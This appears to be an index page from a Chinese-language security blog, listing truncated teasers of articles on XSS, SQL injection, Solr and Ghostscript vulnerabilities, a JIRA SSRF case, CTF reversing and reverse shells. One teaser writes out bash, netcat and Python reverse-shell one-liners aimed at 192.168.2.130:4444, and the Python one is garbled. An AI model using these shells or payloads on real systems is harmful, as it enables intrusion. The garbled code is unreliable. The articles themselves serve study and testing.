- 方向:
- 全部 網路3.0 後端開發 web前端 資料庫 運維 開發工具 php框架 每日程式設計 微信小程式 常見問題 其他 科技 CMS教程 Java 系統教程 電腦教學 硬體教學 手機教學 軟體教學 手遊教學
- 分類:
-
- H3C連接埠安全技術是什麼
- 在網路日益發達的今天,安全是不得不關注的議題。而在企業中威脅交換器連接埠的行為比較多,例如未經授權的用戶主機隨意連接到企業的網路。如員工自己筆記本,可以在不經管理員同意的情況下,拔下某台主機的網線,插在自己帶來的筆記本,然後連入到企業的網路中,這會帶來很大的安全隱患,很有可能造成機密資料的遺失。再比如說未經採用同意安裝集線器HUB等網路設備。有些員工為了增加網路終端的數量,會在未經授權的情況下。將集線器、交換器等設備插入辦公室的網路介面上。如此的話,會導致這個網路介面對應的交換器介面流量增加
- 安全 1169 2023-05-19 12:46:46
-
- 基於GRE的IPSec實例分析
- IP安全保護GRE
- 安全 1039 2023-05-19 12:40:06
-
- xss的小測試是怎麼進行的
- 無安全方面的限制,直接使用alert(/xss/);限制條件:只能使用CSS,不允許使用html標籤我們知道利用expression可以用來構造XSS,但是只能在IE下面測試,所以下面的測試請在IE6中執行。 body{black;xss:alert(/xss/));/*IE6下測試*/}限制:對HTML進行了轉義,Image標籤可用。測試輸入的字元會插入src位址中,那麼可以使用偽協定來繞過。直接輸入alert(/xss/);或者你也可以使用事件來繞過,注意閉合語句即可,如下:1&quo
- 安全 1056 2023-05-19 11:37:06
-
- bash漏洞復現的範例分析
- BourneAgainShell(簡稱BASH)是在GNU/Linux上最受歡迎的SHELL實現,於1980年誕生,經過了幾十年的進化從一個簡單的終端命令行解釋器演變成了和GNU系統深度整合的多功能接口。 Bash,Unixshell的一種。 1989年發布第一個正式版本,原先計劃用在GNU作業系統上,但能運行於大多數類Unix系統的作業系統之上,包括Linux與MacOSXv10.4都將它作為預設shell。它也被移植到MicrosoftWindows上的Cygwin與MinGW,或是可以在MS-
- 安全 1357 2023-05-19 11:13:11
-
- zabbix如何監控traceroute數據
- 1.zabbixserver和proxy安裝mtrmtr腳本放置到zabbixserver和proxy如下路徑:執行chownzabbix:zabbixmtrtrace.shzabbix建立mtrtrace模板:5.將主機關聯到模板,zabbix中觀察資料:【monitoring】-【latestdata】:
- 安全 1025 2023-05-19 11:10:12
-
- Apache Solr velocity模板注入RCE漏洞的範例分析
- 0x01簡介Solr是一個獨立的企業級搜尋應用程式伺服器,它對外提供類似Web-service的API介面。使用者可以透過http請求,向搜尋引擎伺服器提交一定格式的XML文件,產生索引;也可以透過HttpGet操作提出查找請求,並取得XML格式的回傳結果。 0x02漏洞介紹Solr中存在VelocityResponseWriter組件,攻擊者可以構造特定請求修改相關配置,使VelocityResponseWriter組件允許加載指定模板,進而導致Velocity模版註入遠程命令執行漏洞,攻擊者利用該
- 安全 1125 2023-05-19 10:37:13
-
- 利用JIRA漏洞存取美軍非保密網際網路協定路由器網的範例分析
- 以下講述了作者在參與美國國防部(DoD)HackthePentagon漏洞眾測計畫中,利用JIRA漏洞CVE-2017-9506構造了SSRF攻擊面,實現了對美軍非保密因特網協議路由器網(NIPRnet)的訪問,並且結合其它漏洞技巧,取得到DoD內網系統的一系列敏感資訊。由於測試過程和內容的涉密性,該篇文章僅點到為止,未對過多技術細節和詳細場景作出披露,僅當學習分享,還望讀者多多包涵。 JIRA是澳洲Atlassian公司開發的一款優秀的問題追蹤管理軟體工具,可以對各種類型的問題進行追蹤管理,
- 安全 1131 2023-05-18 22:29:09
-
- SQL注入類型有哪些
- 前言SQL注入的攻擊方式依應用程式處理資料庫回傳內容的不同,可分為可顯注入、報錯注入和盲注。可顯注入攻擊者可以直接在目前介面內容中取得想要獲得的內容。報錯注入資料庫查詢回傳結果並沒有在頁面中顯示,但是應用程式將資料庫報錯資訊列印到了頁面中,所以攻擊者可以建構資料庫報錯語句,從報錯資訊中取得想要取得的內容。盲注資料庫查詢結果無法從直覺頁面中獲取,攻擊者透過使用資料庫邏輯或使資料庫庫執行延時等方法來獲取想要獲得的內容。 Mysql手工注入lian合注入?id=1'orderby4--
- 安全 2150 2023-05-18 22:05:12
-
- 反彈shell有哪些
- 1.bash反彈bash-i>&/dev/tcp/ip_address/port0>&12.nc反彈nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socketet.AF.Tocket,subprocess,oss=socket.socket(socketet.AF.Tocket,Tocket. SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- 安全 2192 2023-05-18 22:01:04
-
- NSA新型APT框架DarkPulsar怎麼用
- 前言2017年3月,ShadowBrokers放出了一份震驚世界的機密文檔,其中包括兩個框架:DanderSpritz和FuzzBunch。 DanderSpritz完全由插件組成,用於收集情報、利用漏洞和操控已接管的設備。它是基於Java編寫,提供類似殭屍網路管理面板的圖形介面以及類似Metasploit工具的控制面板。它還整合了用於非FuzzBunch受控設備的後門和插件。 DanderSprit介面概述Fuzzbunch為不同的實用程式提供了一個用於互動和協同工作的框架,包含各種類型的插件,其
- 安全 1347 2023-05-18 20:14:58
-
- 如何進行Ghostscript SAFER沙箱繞過漏洞的分析
- 前言Ghostscript是一款AdobePostScript語言的解譯器軟體。可對PostScript語言進行繪圖,支援PS與PDF互相轉換。目前大多數Linux發行版中都預設安裝,並移植到了Unix、MacOS、Windows等平台,且Ghostscript也被ImagineMagic、PythonPIL和各種PDF閱讀器等程式所使用。漏洞描述8月21日,Google安全研究員TavisOrmandy揭露了多個GhostScript的漏洞,透過在圖片中建構惡意PostScript腳本,可以繞
- 安全 1580 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- 安全 1504 2023-05-18 17:13:20
-
- 繞過限制存取到Google內部管理系統的範例分析
- 蛛絲馬跡某天,在挖掘Google漏洞的過程中,我從公開的漏洞中發現了一些谷歌自身服務的IP位址,一開始,我真不知道這些IP位址能乾嘛。我就先檢查了一遍這些IP位址,進一步發現其中包含了一些谷歌的內部IP。我突然想起來,最近,我的朋友KLSREERAM上報過一個谷歌內部IP相關的漏洞,另一個朋友Vishnu則上報過了一個利用谷歌子域名訪問到控制面板的漏洞。目前,這兩個漏洞都已被Google修復,這兩個漏洞相關的內部IP位址也無法從網路上存取。但是,現在,在我面前就有幾個谷歌內部IP位址,我得想辦法來看看能不能
- 安全 1142 2023-05-18 15:19:49
-
- 如何實作Disk Pulse Eneterprise Window應用程式的漏洞分析
- 一、漏洞簡介DiskPulseEneterprise是一款監視磁碟變化的軟體,它可以透過一個管理埠9120或web管理視窗80對軟體進行連線管理,從而監視磁碟的變更。在DiskPulseEneterprise中有一個動態連結庫libspp.dll,其中有一些負責HTTP操作的函數,問題就出現在這個動態連結庫中,在處理後資料時,由於對於後資料沒有進行嚴格的長度控制,導致在執行取得後資料時造成無效記憶體拷貝資料緩衝區溢出,觸發SEH異常行為處理,最後控制EIP,執行任意程式碼。軟體下載連結:h
- 安全 1138 2023-05-18 15:04:07
-
- APP崩潰的主要原因是什麼
- 一、什麼樣的場景下容易出現崩潰類問題最近腦子裡一直在想什麼樣的問題容易導致崩潰——那就是具有異常思維,舉個例子:正好前兩天看了一部美劇叫《菜鳥老警》,裡面有個場景是主角JohnNolan因為沒有用警車攔住逃犯的車而導致逃犯出逃,這個場景與測試有什麼關聯呢?首先正常人在馬路上行駛都會躲避避免與別人發生碰撞,這就好比測試功能的主流程,不會去亂點亂輸入;但是警察就不一樣了,他會為了抓住逃犯不顧一切,想盡一切辦法,這就好比測試過程中的異常思維,要思考怎麼樣操作使功能不好用。寶典一、異常操作各種異常操作
- 安全 2523 2023-05-18 13:55:06